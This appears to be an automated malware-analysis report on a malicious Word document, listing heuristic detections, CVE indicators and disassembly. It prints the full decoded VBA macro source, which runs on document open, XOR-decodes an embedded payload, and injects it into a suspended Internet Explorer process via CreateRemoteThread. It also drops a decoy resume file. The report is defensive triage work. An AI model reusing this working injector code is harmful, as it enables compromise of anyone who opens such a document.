MALICIOUS
Risk Score: 508

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
The sample exhibits critical heuristic firings for CVE-2007-3899, indicating exploitation of a Microsoft Word memory corruption vulnerability. The presence of VBA macros, specifically AutoOpen and Workbook_Open, along with calls to CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, strongly suggests the execution of injected code. The XOR-encoded strings further indicate obfuscation techniques commonly used by malware.
Heuristics (16)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical; CVE likely; CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- OLE with Ole10Native — possible CVE-2026-21514 exploitation (high; CVE likely; CVE_2026_21514): Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
- ClamAV: Doc.Macro.Injection-6355574-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
- Reference to WriteProcessMemory API (critical; SC_STR_WRITEPROCESSMEMORY)
- Reference to CreateRemoteThread API (critical; SC_STR_CREATEREMOTETHREAD)
- XOR-encoded strings (key 0x5A) (critical; SC_XOR_ENCODED): Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
  Disassembly (attempted x86 opcode disassembly of the encoded region):

  00053A35 1b1e sbb ebx, dword ptr [esi]
  00053A37 0c1b or al, 0x1b
  00053A39 0a13 or dl, byte ptr [ebx]
  00053A3B 6968741e16165a imul ebp, dword ptr [eax + 0x74], 0x5a16161e
  00053A42 5a pop edx
  00053A43 5a pop edx
  00053A44 5a pop edx
  00053A45 3939 cmp dword ptr [ecx], edi
  00053A47 295a0f sub dword ptr [edx + 0xf], ebx
  00053A4A 0e push cs
  00053A4B 1c77 sbb al, 0x77
  00053A4D 625a5a bound ebx, qword ptr [edx + 0x5a]
  00053A50 5a pop edx
  00053A51 0f0e femms
  00053A53 1c77 sbb al, 0x77
  00053A55 6b6c161f5a imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
  00053A5A 5a pop edx
  00053A5B 5a pop edx
  00053A5C 5a pop edx
  00053A5D 0f1413 unpcklps xmm2, xmmword ptr [ebx]
  00053A60 19151e1f5a1d sbb dword ptr [0x1d5a1f1e], edx
  00053A66 3f aas
  00053A67 2e0a28 or ch, byte ptr cs:[eax]
  00053A6A 35393f2929 xor eax, 0x29293f39
  00053A6F 0d33343e35 or eax, 0x353e3433
  00053A74 2d092e3b2e sub eax, 0x2e3b2e09
  00053A79 3335345a1d3f xor esi, dword ptr [0x3f1d5a34]
  00053A7F 2e0f293f movaps xmmword ptr cs:[edi], xmm7
  00053A83 281538303f39 sub byte ptr [0x393f3038], dl
  00053A89 2e13343c adc esi, dword ptr cs:[esp + edi]
  00053A8D 3528373b2e xor eax, 0x2e3b3728
  00053A92 33 .byte 0x33
  00053A93 35 .byte 0x35
  00053A94 34 .byte 0x34
- Reference to CreateProcess API (high; SC_STR_CREATEPROCESS)
- VBA macros detected (medium; 4 related findings; OLE_VBA_MACROS): Document contains VBA macro code
  - CreateObject call (high; OLE_VBA_CREATEOBJ). Matched lines in script:
    Dim wvghsQfShk
    Set wvghsQfShk = CreateObject("ADODB.Stream")
    wvghsQfShk.Type = UkCeYErodm
  - AutoOpen macro (low; OLE_VBA_AUTOOPEN). Matched lines in script:
    Sub AutoOpen()
    hKpmtdwfbcVf
  - Workbook_Open macro (low; OLE_VBA_WBOPEN). Matched lines in script:
    End Sub
    Sub Workbook_Open()
    hKpmtdwfbcVf
  - Environ() call (env variable access) (low; OLE_VBA_ENVIRON). Matched lines in script:
    If Len(Environ("ProgramW6432")) > 0 Then
    MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
- Reference to VirtualAlloc API (medium; SC_STR_VIRTUALALLOC)
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9311 bytes | 587c426db7189503e4ab9cced21d8f6620be462cf127b8671aabe87347d3ddc5 |
Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 85 of 149 identifiers look randomly generated (e.g. 'dtUbCrqDObPvicG') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const UkCeYErodm = 1
Const YFgeuyuYOq = 1, yENVLiDmOw = 2, GgKdJHhbKy = 8
Private Type sRBvucEtdXym
DCAxJpegGSqO As Long
SoAPFyfaUtau As Long
mlOOvdnudbhm As Long
mzqTxeHBQYhb As Long
End Type
Private Type pahHkgGUkaHd
TmwZClrhEJpP As Long
XeiQukksbzWK As String
oiYzPGzZzSbi As String
YAsZdlaJIacm As String
FDMPWIeeaDUb As Long
WmROJrbGYVGQ As Long
XufAvYUPRnmU As Long
ARqHAUkYYXlS As Long
CdvuXeDoJeDG As Long
MzDsaDIrrkqI As Long
TfpYViOHyTNo As Long
sQKJAwbrptVl As Long
VOSBtOkJEUSs As Integer
WcVMHooiSmrR As Integer
YXodNLJHRaio As Long
HFaRXngmEHWs As Long
KgUxVoSeQjMy As Long
uGAtnjfMJXYM As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As LongPtr, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As LongPtr
Private Declare PtrSafe Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As LongPtr
Private Declare PtrSafe Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As LongPtr, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As LongPtr) As LongPtr
Private Declare PtrSafe Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal KyFIKwEtxLQd As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#Else
Private Declare Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As Long, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As Long
Private Declare Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As Long
Private Declare Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As Long, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As Long) As Long
Private Declare Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal lpCurrentDriectory As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#End If
Sub hKpmtdwfbcVf()
Dim AvbfMfOlMFUK As Long, CrnrWEgIYXnR As Variant, aybCpsxMPOMS As Long
Dim eYJMjndWliMH As sRBvucEtdXym
Dim NDRydauLrGFq As pahHkgGUkaHd
Dim mixcHUtJfDZv As String
Dim MDOyCzztxUrq As String
Dim AjBvdifzXQ As String
Dim RTiRHpQQIX() As Byte
Dim hHPJyGviet As Boolean
#If VBA7 Then
Dim DiaisoMVOzOL As LongPtr, lYlWHXgjcPLq As LongPtr
#Else
Dim DiaisoMVOzOL As Long, lYlWHXgjcPLq As Long
#End If
CrnrWEgIYXnR = vbhibywu
If Len(Environ("ProgramW6432")) > 0 Then
MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
Else
MDOyCzztxUrq = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
End If
lYlWHXgjcPLq = UueEbsZDAyRM(mixcHUtJfDZv, MDOyCzztxUrq, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, mixcHUtJfDZv, NDRydauLrGFq, eYJMjndWliMH)
DiaisoMVOzOL = weMFAEEALOZs(eYJMjndWliMH.DCAxJpegGSqO, 0, UBound(CrnrWEgIYXnR), &H1000, &H40)
For aybCpsxMPOMS = LBound(CrnrWEgIYXnR) To UBound(CrnrWEgIYXnR)
AvbfMfOlMFUK = CrnrWEgIYXnR(aybCpsxMPOMS)
lYlWHXgjcPLq = jspvaDVaZVXp(eYJMjndWliMH.DCAxJpegGSqO, DiaisoMVOzOL + aybCpsxMPOMS, AvbfMfOlMFUK, 1, ByVal 0&)
Next aybCpsxMPOMS
lYlWHXgjcPLq = vYRRaPjKJcct(eYJMjndWliMH.DCAxJpegGSqO, 0, 0, DiaisoMVOzOL, 0, 0, 0)
AjBvdifzXQ = Environ("TEMP") & "\Candidate-Resume-2019.doc"
RTiRHpQQIX = wdablndx
hHPJyGviet = TnmOqfNvca(AjBvdifzXQ, RTiRHpQQIX)
Set temp = ActiveDocument
Documents.Open (AjBvdifzXQ)
temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Function TnmOqfNvca(nMhfWtYRnw, uffNizKKSN)
Dim wvghsQfShk
Set wvghsQfShk = CreateObject("ADODB.Stream")
wvghsQfShk.Type = UkCeYErodm
wvghsQfShk.Open
wvghsQfShk.Write uffNizKKSN
wvghsQfShk.SaveToFile nMhfWtYRnw, yENVLiDmOw
End Function
Sub AutoOpen()
hKpmtdwfbcVf
End Sub
Sub Workbook_Open()
hKpmtdwfbcVf
End Sub
Function vbhibywu() As Byte()
Dim FHwuMmFxNTAMpys() As Byte
Dim rjRyGoggFXixUjV As Long
Dim dtUbCrqDObPvicG(7) As Byte
Dim aybCpsxMPOMS As Long
Dim iFmMPheuhFDGdlH() As Byte
Dim hHPJyGviet As Boolean
FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
dtUbCrqDObPvicG(0) = 57
dtUbCrqDObPvicG(1) = 78
dtUbCrqDObPvicG(2) = 82
dtUbCrqDObPvicG(3) = 67
dtUbCrqDObPvicG(4) = 74
dtUbCrqDObPvicG(5) = 89
dtUbCrqDObPvicG(6) = 84
dtUbCrqDObPvicG(7) = 89
aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 212481 - 1)
hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
vbhibywu = iFmMPheuhFDGdlH
End Function
Function wdablndx() As Byte()
Dim FHwuMmFxNTAMpys() As Byte
Dim rjRyGoggFXixUjV As Long
Dim dtUbCrqDObPvicG(7) As Byte
Dim aybCpsxMPOMS As Long
Dim iFmMPheuhFDGdlH() As Byte
Dim hHPJyGviet As Boolean
FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
dtUbCrqDObPvicG(0) = 55
dtUbCrqDObPvicG(1) = 74
dtUbCrqDObPvicG(2) = 65
dtUbCrqDObPvicG(3) = 71
dtUbCrqDObPvicG(4) = 82
dtUbCrqDObPvicG(5) = 56
dtUbCrqDObPvicG(6) = 79
dtUbCrqDObPvicG(7) = 68
aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 93184 - 1)
hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
wdablndx = iFmMPheuhFDGdlH
End Function
Function UWJEcrrGZt(abArray() As Byte) As Long
Dim nLen As Long
UWJEcrrGZt = UBound(abArray) - LBound(abArray) + 1
End Function
Function UEpQaymsbv(ayPYliBNVT As String)
Dim zJxZXxCHca() As Byte
Dim ptYMxfMkoa As Integer: ptYMxfMkoa = FreeFile
Open ayPYliBNVT For Binary Access Read As #ptYMxfMkoa
ReDim zJxZXxCHca(0 To LOF(ptYMxfMkoa) - 1)
Get #ptYMxfMkoa, , zJxZXxCHca
Close #ptYMxfMkoa
UEpQaymsbv = zJxZXxCHca
End Function
Function jtGHjgeTHO(pfvlQrqety() As Byte, nBuYVYWNNO() As Byte) As Long
Dim zyabobJmqN As Boolean
Dim uBgkizOBng As Long
Dim LWnVcvGgUK As Long
Dim tQNVJeQqRk As Long
Dim kxKDAWkaFs As Long
zyabobJmqN = False
tQNVJeQqRk = UWJEcrrGZt(pfvlQrqety)
kxKDAWkaFs = UWJEcrrGZt(nBuYVYWNNO)
For uBgkizOBng = 0 To tQNVJeQqRk
zyabobJmqN = True
For LWnVcvGgUK = 0 To kxKDAWkaFs - 1
If pfvlQrqety(uBgkizOBng + LWnVcvGgUK) <> nBuYVYWNNO(LWnVcvGgUK) Then
zyabobJmqN = False
Exit For
End If
Next LWnVcvGgUK
If zyabobJmqN = True Then
Exit For
End If
Next uBgkizOBng
If zyabobJmqN = False Then
jtGHjgeTHO = -1
Else
jtGHjgeTHO = uBgkizOBng
End If
End Function
Function LrnUaWJVtv(pfvlQrqety() As Byte, xMZyrXvMCa As Long, eIbEiKWFpb As Long) As Byte()
Dim jHrsfbohVM() As Byte
Dim uBgkizOBng As Long
For uBgkizOBng = 0 To eIbEiKWFpb
ReDim Preserve jHrsfbohVM(uBgkizOBng)
jHrsfbohVM(uBgkizOBng) = pfvlQrqety(xMZyrXvMCa + uBgkizOBng)
Next uBgkizOBng
LrnUaWJVtv = jHrsfbohVM
End Function
Function dPYqsoWost(aLroiYYqoh() As Byte, eIbEiKWFpb As Long)
Dim MdvQvXHAeI As Byte
Dim mLwgcnLowc As Long
MdvQvXHAeI = 90
For mLwgcnLowc = 0 To eIbEiKWFpb - 1
aLroiYYqoh(mLwgcnLowc) = aLroiYYqoh(mLwgcnLowc) Xor MdvQvXHAeI
Next mLwgcnLowc
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612090647/Ole10Native | 212955 bytes | bdb813ee80f9f95855db02e810e4e51d75009a7b4e76d641f2e2f93bf7707166 |
| ole10native_01.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612090648/Ole10Native | 93658 bytes | c94978050593ac6cced76ff449533df0c13a2dd7ecdfee9e6796561f584b54ec |